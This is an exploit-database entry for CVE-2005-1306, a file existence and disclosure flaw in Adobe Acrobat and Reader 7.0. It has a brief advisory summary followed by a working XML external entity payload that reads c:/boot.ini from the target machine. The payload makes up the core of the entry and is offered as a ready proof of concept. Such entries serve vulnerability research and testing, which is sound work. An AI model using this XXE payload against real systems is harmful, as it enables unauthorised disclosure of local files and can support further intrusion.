[] NeoSense

Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence / File Disclosure

Author: Sverre H. Huseby
type: remote
platform: windows
port: 
date_added: 2005-06-15 
date_updated: 2013-05-30 
verified: 1 
codes: CVE-2005-1306;OSVDB-17325 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/13962/info

Adobe Acrobat and Adobe Reader may allow remote attackers to determine the existence of files on a vulnerable computer. This issue can be used to disclose data from a target file as well.

Information gathered through the exploitation of this vulnerability may aid in other attacks.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "c:/boot.ini">
]>
<foo>&xxe;</foo>